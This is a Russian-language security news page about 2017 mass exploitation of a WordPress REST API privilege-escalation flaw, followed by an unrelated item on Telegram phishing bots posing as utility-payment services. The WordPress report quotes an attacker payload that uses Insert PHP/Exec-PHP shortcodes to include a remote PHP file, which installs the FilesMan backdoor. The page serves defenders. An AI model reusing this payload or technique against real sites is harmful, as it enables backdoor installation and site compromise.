Атаки на уязвимость в WordPress REST API нужны для установки бэкдоров

Атаки на уязвимость в WordPress REST API нужны для установки бэкдоров

Атаки на уязвимость в WordPress REST API нужны для установки бэкдоров

Массовые атаки на свежую уязвимость в WordPress REST API, исправленную в конце января 2017 года, продолжаются. На прошлой неделе мы рассказывали, что по данным компании WordFence, уязвимость привлекла внимание как минимум 20 хакерских групп, которым удалось скомпрометировать более 1,5 млн страниц.

В настоящий момент количество пострадавших страниц перевалило за два миллиона, а атаки постепенно становятся серьезнее, как и прогнозировали специалисты.

Напомню, что свежая уязвимость была устранена с выходом WordPress 4.7.2, еще 26 января 2017 года. Баг обнаружили специалисты компании Sucuri, и они описывают его как неавторизованную эскалацию привилегий через REST API. Уязвимости подвержены версии 4.7.0 и 4.7.1. Однако публичное раскрытие информации о проблеме состоялось только неделю спустя, так как разработчики хотели, чтобы как можно больше сайтов спокойно установили обновления, пишет xakep.ru.

Уязвимость позволяет неавторизованному атакующему сформировать специальный запрос, при помощи которого можно будет изменять и удалять содержимое любого поста на целевом сайте. Кроме того, используя шорткоды плагинов, злоумышленник может эксплуатировать и другие уязвимости CMS, которые обычно недоступны даже пользователям с высокими привилегиями. В итоге атакующий может внедрить на страницы сайта SEO-спам, рекламу, и даже исполняемый PHP-код, все зависит от доступных плагинов.

Эксперты компании Sucuri заметили, что от простых дефейсов злоумышленники перешли к попыткам удаленного выполнения произвольного кода. Для этих целей хакеры используют плагины Insert PHP (100 000+ установок), Exec-PHP (100 000+ установок) и им подобные. Такие плагины позволяют внедрять PHP-код в посты, чтобы сделать кастомизацию проще.

Исследователи пишут, что теперь дефейс-сообщения хакеров содержат шорткоды для вышеупомянутых плагинов. То есть добавив к своим дефейсам PHP-код, злоумышленники могут добиться его выполнения. В блоге компании эксперты приводят следующий пример, замеченный ими в ходе изучения атак:

content:»[insert_php] include(‘http[:]//acommeamour.fr/tmp/xx.php’); [/insert_php]
[php] include(‘http[:]//acommeamour.fr/tmp/xx.php’); [/php]»,
«id»:»61a»}

Данный пример приводит к скачиванию бэкдора FilesMan и его установке в директорию /wp-content/uploads/.

Теперь специалисты Sucuri рекомендуют администраторам отключить все потенциально опасные плагины и обновиться до WordPress 4.7.2, если они по какой-то причине еще этого не сделали. Исследователи поясняют, что такие атаки – это способ монетизации уязвимости. Тогда как обычными дефейсами много не заработаешь, размещение бекдора на сервере жертвы позволяет злоумышленникам вернуться позже, даже после устранения оригинальной уязвимости, и разместить на скомпрометированном ресурсе SEO-спам, рекламу или малварь.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

В Telegram активизировались мошенники, собирающие данные пользователей ЖКУ

Последние месяцы в Angara Security фиксируют всплеск активности мошенников, маскирующих свои телеграм-боты под сервисы оплаты ЖКУ. Новые атаки, по мнению экспертов, спровоцировала реализация проекта по цифровизации ЕПД.

Инициатива Минстроя РФ по тотальному переводу единых счетов ЖКХ в электронную форму, доступную через ГИС ЖКХ и Госуслуги, еще не узаконена, однако сетевые аферисты уже подхватили актуальную тему и усиленно ее эксплуатируют.

«Эксперты отмечают всплеск мошеннических схем в мессенджере Telegram на фоне реализации в ряде российских регионов проекта по переходу на единый платежный документ за жилищно-коммунальные услуги в электронном виде, — цитирует РИА Новости комментарий Angara. — Злоумышленники активно используют новостную повестку, чтобы заманить пользователей в фишинговые боты, имитирующие сервисы управляющих компаний».

Поддельные сервисы ЖКХ в популярном мессенджере, по данным аналитиков, предлагают не только оплату счетов по единому документу, но также передачу показаний счетчиков, оформление заявок через диспетчерскую и решение других вопросов, волнующих собственников жилья.

Действующие в Telegram мошенники заманивают пользователей в такие боты с помощью личных сообщений от имени управляющих компаний и председателей ТСЖ / ЖСК. Подобные злоумышленники могут также объявиться в локальном чате, рекомендуя участникам некий бот-ассистент.

Во всех случаях потенциальным жертвам предлагается перейти по фишинговой ссылке, якобы для уточнения персональных данных. Ввиду возросшей угрозы эксперты напоминают: управляющие компании и ТСЖ никогда не проводят массовые рассылки в мессенджерах с целью уточнения ПДн либо финансовой информации.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru